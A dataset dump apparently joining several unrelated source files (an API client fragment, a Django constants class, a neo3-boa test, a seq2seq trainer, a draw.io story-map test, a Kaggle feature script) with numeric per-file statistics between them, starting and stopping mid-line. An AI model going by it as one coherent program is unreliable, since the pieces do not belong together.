auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
38.469595
137
0.60894
2,687
22,774
4.894306
0.062151
0.049882
0.025549
0.032849
0.961372
0.959927
0.95795
0.951258
0.946164
0.940081
0
0.016131
0.303153
22,774
591
138
38.534687
0.812539
0.328884
0
0.803175
1
0
0.181533
0.062696
0
0
0
0
0
1
0.04127
false
0
0.012698
0
0.114286
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
402cf7f9557f5187f85882c47d299f9119ff4a81
246
py
Python
practice_platform_backend/account/__init__.py
Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
practice_platform_backend/account/__init__.py
Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
practice_platform_backend/account/__init__.py
Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
class UserIdentity: QUISHOP_STAFF = "QUISHOP_STAFF" TENANT_STAFF = "TENANT_STAFF" CUSTOMER = "CUSTOMER" CHOICES = [ (QUISHOP_STAFF, QUISHOP_STAFF), (TENANT_STAFF, TENANT_STAFF), (CUSTOMER, CUSTOMER), ]
24.6
39
0.634146
23
246
6.434783
0.304348
0.324324
0.432432
0.324324
0.837838
0.837838
0.837838
0.837838
0.837838
0.837838
0
0
0.264228
246
9
40
27.333333
0.81768
0
0
0
0
0
0.134146
0
0
0
0
0
0
1
0
false
0
0
0
0.555556
0
1
0
0
null
1
1
1
1
1
1
1
1
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
12
40393a9e51f6ec065a5bc48f6b56f61da47a3d96
96
py
Python
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
25
2020-07-22T19:37:43.000Z
2022-03-08T03:23:55.000Z
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
419
2020-04-23T17:48:14.000Z
2022-03-31T13:17:45.000Z
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
15
2020-05-21T21:54:24.000Z
2021-11-18T06:17:24.000Z
from boa3.builtin.interop.policy import is_blocked def main() -> int: return is_blocked()
16
50
0.729167
14
96
4.857143
0.857143
0.264706
0
0
0
0
0
0
0
0
0
0.0125
0.166667
96
5
51
19.2
0.8375
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
8
40452005f52f1a39ebf3f380e923e3a865da5e43
9,413
py
Python
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
3
2021-02-18T10:40:29.000Z
2022-01-28T10:20:54.000Z
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
8
2020-11-13T19:00:13.000Z
2022-02-10T02:10:28.000Z
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
1
2021-06-23T12:37:12.000Z
2021-06-23T12:37:12.000Z
from random import shuffle from typing import List, Union from unify_eval.model.deep_model import DeepModel from unify_eval.model.mixins.sequences.language_models import LayeredLanguageModel from unify_eval.training.callback import TrainerCallback from unify_eval.training.seq2seq.seq2seq_data import Seq2SeqData from unify_eval.training.trainer import Trainer from unify_eval.utils.load_data import KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader class Seq2SeqModelTrainer(Trainer): """ Same as Trainer, but resets model state between calls """ def __init__(self, data_loader: Union[KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader], minibatch_callbacks: List[TrainerCallback], batch_callbacks: List[TrainerCallback], text_kw: str = "texts"): super().__init__(data_loader, minibatch_callbacks, batch_callbacks) self.text_kw = text_kw def train_on_minibatch(self, model: LayeredLanguageModel, keyed_minibatch: dict, i_minibatch: int, iteration: int, backprop_length: int = 150, minibatch_size: int = 64, **kwargs) -> DeepModel: tokenized_texts = model.preprocessing.tokenizer.tokenize_all( texts=list(keyed_minibatch.pop(self.text_kw))) # shuffle texts shuffle(tokenized_texts) lm_data = Seq2SeqData.generate_stateful_lm_data( sequence_mapper=model.preprocessing.sequence_mapper, tokenized_texts=tokenized_texts, minibatch_size=minibatch_size, backprop_length=backprop_length) model.train_mode() with model: model.train(data=lm_data, **keyed_minibatch, **kwargs) model.eval_mode() for call_back in self.minibatch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, **keyed_minibatch, **kwargs, minibatch_size=minibatch_size, backprop_length=backprop_length) call_back.global_step += 1 model.reset() return model def train_on_full_batch(self, model: LayeredLanguageModel, minibatch_size: int, iteration: int, progress_bar: bool = True, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> DeepModel: print(f"training iteration {iteration}") i_minibatch = 0 for i_minibatch, minibatch in enumerate(self.data_loader.yield_minibatches(minibatch_size=text_batch_size, progress_bar=progress_bar)): self.train_on_minibatch(model=model, keyed_minibatch=minibatch, i_minibatch=i_minibatch, iteration=iteration, backprop_length=backprop_length, minibatch_size=minibatch_size, **kwargs) model.reset() for call_back in self.batch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, minibatch_size=minibatch_size, backprop_length=backprop_length, **kwargs) call_back.global_step += 1 return model def train_model(self, model: LayeredLanguageModel, n_iterations: int, minibatch_size: int, progress_bar: bool = True, initial_iteration: int = 0, run_name: str = "run0", backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> DeepModel: print("preparing callbacks ...") for callbacks in (self.minibatch_callbacks, self.batch_callbacks): for callback in callbacks: callback.prepare_run(run_name=run_name, **kwargs) print("training ...") for iteration in range(initial_iteration, n_iterations + initial_iteration): self.train_on_full_batch(model=model, minibatch_size=minibatch_size, iteration=iteration, progress_bar=progress_bar, backprop_length=backprop_length, **kwargs) self.data_loader.reset() return model class CompSeq2SeqModelTrainer(Trainer): """ Same as Trainer, but resets model state between calls """ def __init__(self, data_loader: Union[KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader], minibatch_callbacks: List[TrainerCallback], batch_callbacks: List[TrainerCallback], text_kw: str = "texts"): super().__init__(data_loader, minibatch_callbacks, batch_callbacks) self.text_kw = text_kw def train_on_minibatch(self, model: LayeredLanguageModel, keyed_minibatch: dict, i_minibatch: int, iteration: int, backprop_length: int = 150, minibatch_size: int = 64, **kwargs) -> LayeredLanguageModel: tokenized_texts = model.tokenizer.tokenize_all(texts=list(keyed_minibatch.pop(self.text_kw))) # shuffle texts shuffle(tokenized_texts) lm_data = Seq2SeqData.generate_stateful_lm_data(sequence_mapper=model.sequence_mapper, tokenized_texts=tokenized_texts, minibatch_size=minibatch_size, backprop_length=backprop_length) model.train_mode() with model: model.train(data=lm_data, **keyed_minibatch) model.eval_mode() for call_back in self.minibatch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, **keyed_minibatch, **kwargs, minibatch_size=minibatch_size, backprop_length=backprop_length) call_back.global_step += 1 model.reset() return model def train_on_full_batch(self, model: LayeredLanguageModel, minibatch_size: int, iteration: int, progress_bar: bool = True, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> LayeredLanguageModel: print(f"training iteration {iteration}") i_minibatch = 0 for i_minibatch, minibatch in enumerate(self.data_loader.yield_minibatches(minibatch_size=text_batch_size, progress_bar=progress_bar)): self.train_on_minibatch(model=model, keyed_minibatch=minibatch, i_minibatch=i_minibatch, iteration=iteration, backprop_length=backprop_length, minibatch_size=minibatch_size, **kwargs) model.reset() for call_back in self.batch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, minibatch_size=minibatch_size, backprop_length=backprop_length, **kwargs) call_back.global_step += 1 return model def train_model(self, model: LayeredLanguageModel, n_iterations: int, minibatch_size: int, progress_bar: bool = True, initial_iteration: int = 0, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> LayeredLanguageModel: print("training ...") for iteration in range(initial_iteration, n_iterations + initial_iteration): self.train_on_full_batch(model=model, minibatch_size=minibatch_size, iteration=iteration, progress_bar=progress_bar, backprop_length=backprop_length, **kwargs) self.data_loader.reset() return model
45.038278
118
0.527143
799
9,413
5.904881
0.133917
0.077151
0.04663
0.055108
0.851844
0.851844
0.851844
0.851844
0.851844
0.851844
0
0.010456
0.410709
9,413
208
119
45.254808
0.840094
0.014448
0
0.860465
0
0
0.013088
0
0
0
0
0
0
1
0.046512
false
0
0.046512
0
0.139535
0.02907
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
4075f0c2c55d14dc486cf7d317586b59195806d0
10,852
py
Python
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
#!/usr/bin/env python import pytest from markdownusm.parser import MarkdownParser from markdownusm.usm import Usm from markdownusm.xml import XMLObjects @pytest.fixture def markdown(): return """ - Release1 - Release2 - Release3 - Release4 - Release5 <!-- Comment ## Comment Comment --- Comment Comment --> # Activity ## Task Story Story --- --- Story ## Task --- Story Story Story --- Story # Activity ## Task --- Story --- Story <!-- Story --> ## Task Story Story Story Story --- --- Story Story Story """ @pytest.fixture def expected(): return """ <mxfile> <diagram> <mxGraphModel dx="661" dy="316" grid="0" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0" background="#FFFFFF"> <root> <mxCell id="0"/> <mxCell id="1" parent="0"/> <mxCell value="Activity" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#1F568A;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="50.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="290.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="610.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="690.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="290.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="370.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="450.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="850.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="930.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release1" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release2" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release3" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="202.0" as="sourcePoint"/> <mxPoint x="930.0" y="202.0" as="targetPoint"/> </mxGeometry> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="522.0" as="sourcePoint"/> <mxPoint x="930.0" y="522.0" as="targetPoint"/> </mxGeometry> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="762.0" as="sourcePoint"/> <mxPoint x="930.0" y="762.0" as="targetPoint"/> </mxGeometry> </mxCell> </root> </mxGraphModel> </diagram> </mxfile> """ def test_integration(markdown, expected): parser = MarkdownParser(markdown=markdown) # Create list of dictionaries activities_list = parser.extract_activities_with_position() tasks_list = parser.extract_tasks_with_position() stories_list = parser.extract_stories_with_position() release_texts_list = parser.extract_release_texts_with_position() release_bars_list = parser.create_release_bars_with_position() # Create XML objects usm_activities = Usm(source=activities_list) usm_tasks = Usm(source=tasks_list) usm_stories = Usm(source=stories_list) usm_release_texts = Usm(source=release_texts_list) usm_release_bars = Usm(source=release_bars_list) # Create XML documents activities = usm_activities.to_activities() tasks = usm_tasks.to_tasks() stories = usm_stories.to_stories() release_texts = usm_release_texts.to_release_texts() release_bars = usm_release_bars.to_release_bars() export = XMLObjects( shapes=activities + tasks + stories + release_texts + release_bars ).render() import re pat = "<.*?>" assert re.findall(pat, export) == re.findall(pat, expected)
53.196078
221
0.667527
1,449
10,852
4.959972
0.095928
0.008348
0.037568
0.056769
0.809935
0.803256
0.801169
0.801169
0.784194
0.784194
0
0.078384
0.155916
10,852
203
222
53.458128
0.706223
0.008109
0
0.536313
0
0.290503
0.875651
0.377788
0
0
0
0
0.005587
1
0.01676
false
0
0.027933
0.011173
0.055866
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
40b115a79779c02000753ee3d28c02e1e2a404d1
127,131
py
Python
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np from sklearn.preprocessing import MaxAbsScaler from sklearn.decomposition import TruncatedSVD, SparsePCA, FactorAnalysis from sklearn.random_projection import SparseRandomProjection from scipy.stats import ks_2samp from scipy.stats import kurtosis, skew, mode from Models import LightGBM from sklearn.model_selection import train_test_split, KFold from sklearn.cluster import KMeans from sklearn.metrics import mean_squared_error from math import sqrt def geo_mean_overflow(iterable): a = np.log(iterable) return np.exp(a.sum() / len(a)) def load_df_from_path(path): df = pd.read_csv(path, index_col=0) return df def running_mean(x, N): cumsum = np.cumsum(np.insert(x, 0, 0)) return (cumsum[N:] - cumsum[:-N]) / float(N) def compute_EMA(x, alpha): '''Compute EMA for array, x goes from newer to older''' inv_x = x[::-1] df = pd.DataFrame(inv_x) return np.squeeze(df.ewm(alpha=alpha).mean().values[-1]) def compute_TS_aggregates(df, prefix='TS'): '''Add aggregates rowise considering TS properties''' agg_df = pd.DataFrame(index=df.index) for index, row in df.iterrows(): non_zero_values = row.iloc[row.nonzero()] if non_zero_values.empty: continue non_zero_values = non_zero_values.values agg_df.at[index, '{}_non_zero_mean'.format( prefix)] = non_zero_values.mean() agg_df.at[index, '{}_non_zero_max'.format( prefix)] = non_zero_values.max() agg_df.at[index, '{}_non_zero_min'.format( prefix)] = non_zero_values.min() agg_df.at[index, '{}_non_zero_std'.format( prefix)] = np.std(non_zero_values) agg_df.at[index, '{}non_zero_median'.format(prefix)] = \ np.median(non_zero_values) agg_df.at[index, '{}_non_zero_gmean'.format(prefix)] = \ geo_mean_overflow(non_zero_values) agg_df.at[index, '{}_non_zero_skewness'.format(prefix)] = \ skew(non_zero_values) agg_df.at[index, '{}_non_zero_kurtosis'.format(prefix)] = \ kurtosis(non_zero_values) agg_df.at[index, '{}non_zero_q1'.format(prefix)] = \ np.percentile(non_zero_values, q=25) agg_df.at[index, '{}non_zero_q3'.format(prefix)] = \ np.percentile(non_zero_values, q=75) agg_df.at[index, '{}non_zero_log_mean'.format(prefix)] = \ np.log1p(non_zero_values).mean() agg_df.at[index, '{}non_zero_log_max'.format(prefix)] = \ np.log1p(non_zero_values).max() agg_df.at[index, '{}non_zero_log_min'.format(prefix)] = \ np.log1p(non_zero_values).min() agg_df.at[index, '{}non_zero_log_std'.format(prefix)] = \ np.log1p(np.std(non_zero_values)) agg_df.at[index, '{}non_zero_log_sum'.format(prefix)] = \ np.log1p(non_zero_values).sum() agg_df.at[index, '{}non_zero_log_median'.format(prefix)] = \ np.median(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_q1'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=25) agg_df.at[index, '{}non_zero_log_q3'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=75) agg_df.at[index, '{}non_zero_log_gmean'.format(prefix)] = \ geo_mean_overflow(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_skewness'.format(prefix)] = \ skew(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_kurtosis'.format(prefix)] = \ kurtosis(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_EMA25'.format(prefix)] = \ compute_EMA(np.log1p(non_zero_values), alpha=0.2) agg_df.at[index, '{}non_zero_EMA25'.format(prefix)] = \ compute_EMA(non_zero_values, alpha=0.2) # agg_df.at[index, '{}non_zero_EMA50'.format(prefix)] = \ # compute_EMA(non_zero_values, alpha=0.5) # agg_df.at[index, '{}non_zero_EMA75'.format(prefix)] = \ # compute_EMA(non_zero_values, alpha=0.75) for k in [5, 10]: agg_df.at[index, '{}_{}first_non_zero_mean'.format( prefix, k)] = non_zero_values[:k + 1].mean() agg_df.at[index, '{}_{}first_non_zero_max'.format( prefix, k)] = non_zero_values[:k + 1].max() agg_df.at[index, '{}_{}first_non_zero_min'.format( prefix, k)] = non_zero_values[:k + 1].min() agg_df.at[index, '{}_{}first_non_zero_std'.format( prefix, k)] = np.std(non_zero_values[:k + 1]) agg_df.at[index, '{}non_zero_median'.format(prefix, k)] = \ np.median(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_gmean'.format(prefix, k)] = \ geo_mean_overflow(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_skewness'.format(prefix, k)] = \ skew(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_kurtosis'.format(prefix, k)] = \ kurtosis(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_q1'.format(prefix, k)] = \ np.percentile(non_zero_values[:k + 1], q=25) agg_df.at[index, '{}_{}first_non_zero_q3'.format(prefix, k)] = \ np.percentile(non_zero_values[:k + 1], q=75) agg_df.at[index, '{}_{}first_non_zero_log_mean'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).mean() agg_df.at[index, '{}_{}first_non_zero_log_max'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).max() agg_df.at[index, '{}_{}first_non_zero_log_min'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).min() agg_df.at[index, '{}_{}first_non_zero_log_std'.format(prefix, k)] = \ np.log1p(np.std(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_sum'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).sum() agg_df.at[index, '{}_{}first_non_zero_log_median'.format(prefix, k)] = \ np.median(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_q1'.format(prefix, k)] = \ np.percentile(np.log1p(non_zero_values[:k + 1]), q=25) agg_df.at[index, '{}_{}first_non_zero_log_q3'.format(prefix, k)] = \ np.percentile(np.log1p(non_zero_values[:k + 1]), q=75) agg_df.at[index, '{}_{}first_non_zero_log_gmean'.format(prefix, k)] = \ geo_mean_overflow(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_skewness'.format(prefix, k)] = \ skew(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_kurtosis'.format(prefix, k)] = \ kurtosis(np.log1p(non_zero_values[:k + 1])) # agg_df.at[index, '{}_{}non_zero_EMA25'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.25) # agg_df.at[index, '{}_{}non_zero_EMA50'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.50) # agg_df.at[index, '{}_{}non_zero_EMA75'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.75) return agg_df def compute_row_aggregates(df, prefix=''): '''Add series of aggreagates to dataset rowise''' agg_df = pd.DataFrame(index=df.index) for index, row in df.iterrows(): non_zero_values = row.iloc[row.nonzero()] if non_zero_values.empty: continue non_zero_values = non_zero_values.values agg_df.at[index, '{}_non_zero_mean'.format( prefix)] = non_zero_values.mean() agg_df.at[index, '{}_non_zero_max'.format( prefix)] = non_zero_values.max() agg_df.at[index, '{}_non_zero_min'.format( prefix)] = non_zero_values.min() agg_df.at[index, '{}_non_zero_std'.format( prefix)] = np.std(non_zero_values) agg_df.at[index, '{}_non_zero_sum'.format( prefix)] = non_zero_values.sum() agg_df.at[index, '{}non_zero_median'.format(prefix)] = \ np.median(non_zero_values) agg_df.at[index, '{}_non_zero_gmean'.format(prefix)] = \ geo_mean_overflow(non_zero_values) agg_df.at[index, '{}_non_zero_skewness'.format(prefix)] = \ skew(non_zero_values) agg_df.at[index, '{}_non_zero_kurtosis'.format(prefix)] = \ kurtosis(non_zero_values) agg_df.at[index, '{}non_zero_q1'.format(prefix)] = \ np.percentile(non_zero_values, q=25) agg_df.at[index, '{}non_zero_q3'.format(prefix)] = \ np.percentile(non_zero_values, q=75) mode_ = mode(np.around(non_zero_values, decimals=4)) agg_df.at[index, '{}_non_zero_mode'.format(prefix)] = mode_[ 0] if mode_[1] > 1 else 0 agg_df.at[index, '{}_non_zero_mode_count'.format(prefix)] = mode_[1] # LOG AGGREGATES agg_df.at[index, '{}non_zero_log_mean'.format(prefix)] = \ np.log1p(non_zero_values).mean() agg_df.at[index, '{}non_zero_log_max'.format(prefix)] = \ np.log1p(non_zero_values).max() agg_df.at[index, '{}non_zero_log_min'.format(prefix)] = \ np.log1p(non_zero_values).min() agg_df.at[index, '{}non_zero_log_std'.format(prefix)] = \ np.log1p(np.std(non_zero_values)) agg_df.at[index, '{}non_zero_log_sum'.format(prefix)] = \ np.log1p(non_zero_values).sum() agg_df.at[index, '{}non_zero_log_median'.format(prefix)] = \ np.median(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_q1'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=25) agg_df.at[index, '{}non_zero_log_q3'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=75) agg_df.at[index, 